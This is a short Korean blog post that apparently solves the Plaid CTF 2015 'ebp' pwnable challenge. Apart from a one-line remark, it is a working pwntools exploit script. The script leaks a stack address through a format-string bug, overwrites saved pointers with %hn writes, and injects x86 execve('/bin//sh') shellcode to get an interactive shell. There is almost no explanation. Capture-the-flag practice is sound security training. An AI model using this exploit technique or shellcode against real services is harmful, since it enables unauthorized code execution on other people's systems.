cdor1's lab
Plaid CTF 2015 ebp 본문
후기 : fsb 죽어라!!
from pwn import *
context.log_level = 'debug'
sh = '\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89'
sh += '\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80'
s = remote('localhost',4000)
s.sendline('%4$x')
ebp = s.recvuntil('\n')
ebp = int(ebp,16)+4 & 0xffff
payload = '%' + str(ebp) + 'c%4$hn'
s.sendline(payload)
s.recvuntil('\n')
exp = sh + '%' + '41060' + 'c' + '%12$hn'
s.sendline(exp)
s.recvuntil('\n')
s.interactive()
'Security > Pwnable' 카테고리의 다른 글
| codegate 2015 yocto (0) | 2016.09.15 |
|---|---|
| Codegate 2014 Quals minibomb (0) | 2016.09.11 |
| Plaid CTF 2014 ezhp (0) | 2016.09.10 |
| Plaid CTF 2014 kappa (0) | 2016.09.04 |
| FTZ level10 (0) | 2016.04.30 |
Comments